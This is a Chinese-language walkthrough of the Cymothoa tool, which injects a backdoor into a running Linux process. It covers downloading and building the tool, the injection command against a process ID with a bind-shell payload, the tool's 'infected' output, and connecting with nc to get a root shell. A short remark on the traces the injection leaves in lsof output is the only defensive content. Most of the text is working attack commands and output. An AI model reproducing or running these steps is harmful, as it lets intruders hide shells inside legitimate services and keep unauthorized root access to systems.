下载:https://sourceforge.net/projects/cymothoa/files/
测试环境:
32位环境下可以编译成功
[root@localhost cymothoa-1-alpha]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux
64位环境下编译报错
后门注入的目标进程只要当前用户对其有操作权限即可；反弹得到的 shell 也只具有该进程本身的权限；一旦该进程重启或崩溃，后门随之消失，不具备持久性。
[root@localhost cymothoa-1-alpha]# make
cc cymothoa.c -o cymothoa -Dlinux_x86
[root@localhost cymothoa-1-alpha]# ./cymothoa -p 3055 -s 0 -y 4444   // 3055 为要注入进程的进程号
[+] attaching to process 3055
register info:
-----------------------------------------------------------
eax value:0xfffffffc ebx value:0x9c44400
esp value:0xbf9fc434 eip value:0x51c402
------------------------------------------------------------
[+]new esp:0xbf9fc430
[+] injecting code into 0x008c1000
[+] copy general purpose registers
[+] detaching from 3055
[+] infected!!!
比如注入到 httpd 进程中，然后用 nc 连接。注意下面示例中的监听端口是 8888（与上面命令中的 -y 4444 不是同一次演示）；从 lsof 输出可以看到被注入进程派生出的 sh 进程，其标准输入、输出、错误（fd 0、1、2）都绑定在同一条 TCP 连接上，这也是此类注入在主机上留下的明显痕迹。
[root@localhost mafix]# netstat -ano | grep 8888
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN off (0.00/0/0)
[root@localhost mafix]# lsof -i:8888
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sh 15575 root 0u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
sh 15575 root 1u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
sh 15575 root 2u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
sh 15575 root 10u IPv4 55603 TCP *:ddi-tcp-1 (LISTEN)
sh 15575 root 11u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
[root@localhost mafix]# ps axu | grep 15575| grep -v grep
root 15575 0.0 0.0 2556 984 ? S 21:59 0:00 /bin//sh
root@kali-vincent:~# nc -vv 172.16.100.156 8888
172.16.100.156: inverse host lookup failed: Unknown host
(UNKNOWN) [172.16.100.156] 8888 (?) open
whoami
root